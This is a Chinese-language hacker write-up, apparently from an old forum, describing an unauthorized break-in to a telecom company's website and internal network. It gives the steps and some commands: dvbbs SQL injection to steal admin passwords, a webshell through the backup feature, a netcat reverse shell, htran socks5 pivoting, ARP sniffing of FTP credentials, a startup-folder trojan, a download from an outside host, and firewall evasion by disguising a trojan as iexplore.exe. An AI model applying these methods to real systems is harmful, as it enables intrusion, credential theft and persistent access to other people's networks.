|
一、踩点:
http://xxx.online.xx.xx XX电信的站点,这个站是我一直都想拿下的,首页存在注入点,是sa
登陆,数据库是放另一外网的主机,那台主机禁止对外连接,但是可以上网,对外不开放端口。
http://xxx.online.xx.xx/bbs为其论谈,是access+dvbbs7.0 sp2.
二、拿下aspshell
动网前台提权的方法我就不多说了,jinsdb给的工具,很快就提完前台。不抓图,继续.
得到前台后就是对拿后台。动网recycle.asp过滤不严,导致注入漏洞的存在,先说一下,漏洞不是我发现的,构造注入点如下:
这里要注意的是,这个漏洞的前提是以前台管理员身份登陆,对access和mssql的dvbbs 7.x通杀,通过上面的构造,就可以暴出l_content的内容
这里还要说的是,最后面的&page=7,通过上面的注入语句是暴出所有l_content的值,但是动网一个界面只能显示10多条,所以大家通过修改
page的值来找l_content的内容,一般是在最后几个数字,这个page是回收站的页数,如果一共有130页,你一般从120开始,这样,通过121,122
,一直累注上去,直到找出password的明文,如果你懂点sql的话,当然也可以用来暴管理员的散列,只是变换一下注入语句而已,如:
利用上面的注射方式,可以暴出l_content的值,当然,如果你想暴dv_admin的话,只要构造一下注射语句就可以了。利用这种注册很快暴出
前后台的账号和密码。如图一:
而对于sql方法更多,动网的其它文件也存在注入漏洞,如:先查看一下随便一个用户的资料,在最下面的奖惩处点一下,如图二:
接着在操作理由里输入:
这样在后台就加了一个linzi123的用户。进到后台后,sql的和access在备份的地方有些不同,偶给大家一个备份得shell的文件databack.htm.
打开他的源代码,找到语句
<form method="post" action="http://目标主机/ADMIN_data.asp?action=BackupData&act=Backup">
把目标主机换成你已经进入后台的url就可以了,如http://www.cnbct.org/bbs/,接下来就和access的一样了,方法我就不多说了。
当然你也可以利用backup a shell,在国内几个商业黑客站点里有文章介绍。但是要注意的是要看权限,public权限就别想的了,至少我是无法做到。
三、代理的妙用
思路:
得到aspshell后,从传统的思维模式从发,先拿下这台机子,然后再向内网渗透。但是通过踩点后发现,主机的安全性做的还可以,没什么可
以利用的第三方补丁。提权,以自身的水平来说,还无法这现。通过踩点可以知道,目录限的很死,activeX禁创控件,虽然主机有用Serv-U,但
是改了端口和默认的账号和密码,所以根本无法提权。这时的想法是,先利用jet exp得到一个可执行的shell,然后,利用这个shell把主机做
成一个socks5肉鸡,通过反弹,本机也进入其内网,再接着,就是扫描嗅探出主机Serv-U的账号和密码,然后quote site exec执行命令.
实践过程:
1.本地执行:jet 1 222.222.222.222 520
其中222.222.222.222为本机的IP,520为听的端口.生成一个db1.mdb,
2.把它上传到xxx.online.xx.xx,利用老兵的数据库操作功能打开这个db1.mdb,当然用海阳2006的数据库操作功能也可以,
只要可以打开就可以.
3.本机事先用nc执行nc -vv -l -p 520,很快就得到一个反弹的shell,这里说一下,反弹的权限是当前权
限,当你用system admin打开db.mdb,返回的会是systemshell,而在aspshell下打开则返回了aspshell的权限。
4.得到shell后,再上传一个htran,新板的htran有个sock5反弹的功能。执行如下:
本机: htran -s -listen 670 6700
xxx.online.xx.xx的aspshell上执行:htran -s -connect 我的IP 670
5.本机再用sockcap连接我的IP的6700端口,自己就变成了在他的内网中,这里要说的是guest权限是可以实现socks5的转发,大家不必去担心权限
不够。 sockscap连接后,挂上扫描器,这个时候你扫的就会是那个内网所在的机子了,偶挂上后扫到内网几台弱口令的机子。
四、向主机进军
得到内网的机子的system权限后,开了他的TS,并用htran转到了公网(详情见我做的动画,光备里有)。有了一个GUI界面,
也就方便自己的渗透,开始驱动,准备arpsniffer,因为主机有ftp,且是serv-u,所以我选择了嗅探它的21端口。对于嗅探的内容,网上有很
多人做成了动画,大家去国内的黑客站点搜索一下就有资料。但是有一点要说一下,有些朋友在嗅探时老是显示can’n spoof等等出错,我建
议大家去小榕的官方去下载原板的,个人觉得是驱动问题,大家换旧的驱动,不要用新的,个人经验。
几天后,再登上内网的机子,查了一下嗅的文件,看到了漂亮的ftp密码,不过不是system权限,好在目录是c:\,有写的权限,向启动写了一个
批处理志,内容就是运行偶上传的马儿,这里的马,偶放了一个没公布的马,免杀嘛!几天后就看到反弹了。反弹后,偶先把它做成了sockscap
肉鸡,这个时候做成服务,方便以后进来。用sockscap加个
服务器,主要是方面以后的渗透,做完后,用sockscap添加3389登陆器,然后连接127.0.0.1就看到了界面,如图五:
五、向最难的SQL进军
查看conn.asp文件后,可知mssql服务器的IP是另一公网主机,不过,这台主机很让人难过,因为那台主机做了IP限制,
只对xxx.online.xx.xx开放1433端口,其它的主机碰都碰不到它,另外采用软硬结合的,禁止程序对外连接,还好可以上网。
到这里对于渗透这台主机有两个思路:
1.端口复用,把3389端口复用在1433上,跑到群里问了一下lcx,他说htran可以复用,但是试过后发现不可以,再后来lcx说原来他在测试时,
mssql没有打开,所以可以用,哈哈。不过,给他装个rookit,利用rookit或后门来实现复用。不过没去试,只是一个思路。
2.端口转发.
先把sql给停掉,这样1433端口就可以用了,再利用htran把TS映到1433,用xxx.online.xx.xx 这台主机连接1433,就可以得到GUI界面。这里
大家可以利用at命令写个批处理志,然后先停后转发。因为是sa权限,所以不用担心权限,先写一个down.vbs,在nbsi里输入:
然后cscript http://linzi.cnbct.org/mt.exe mt.exe //下载一个免杀的mt.exe,再用mt -pslist找到mssql的进程。
再写个批处志,代码如下:
@echo off
mt -pskill ID
htran -p -tran 1433 127.0.0.1 3389
再用at命令执行批处志,当然还有其它好的方法,但我最后是利用第二个方法,拿下了最难搞的sql.
这里还有要说的,对于碰到程序,这个时候,你的反弹的马儿,一般都反不回来,这个时候我建议大家可以试着用插信任的进程,或者
替换掉信任程序的方法来突破,如C:\Program Files\Internet Explorer\IEXPLORE.EXE里的iexplore.exe是被信任的,
这个时候你可以把你的木马传到C:\Program Files\Internet Explorer\文件夹里,并把他的名称改为iexplore.exe,这里主要是利用对
程序的判断只局限于路径和文件名的判断上,我在虚拟机里我测试通过,测试的是天网,其它的没试,大家有兴趣的话可以自己测试一下.
六、总结
这里的总结是对新手说的,也是我个人学习的经验。当你看一篇文章时,不要一晃而过,对于经典的文章有它要取之处,多做笔记,多去了解
一下它在哪个地方值得学习,或者是很好的,记下来,不断的总结与学习,知识沉淀到一定程度,当它暴发,会很美很精彩。
对于这篇文章,技术水平不是很高,但如果你从中学到了东西,那么这篇文章也就尽了它的作用。
如果还有不太明白的可以到非安全或者BCT来找我,我会尽量帮大家。
|
当前位置:
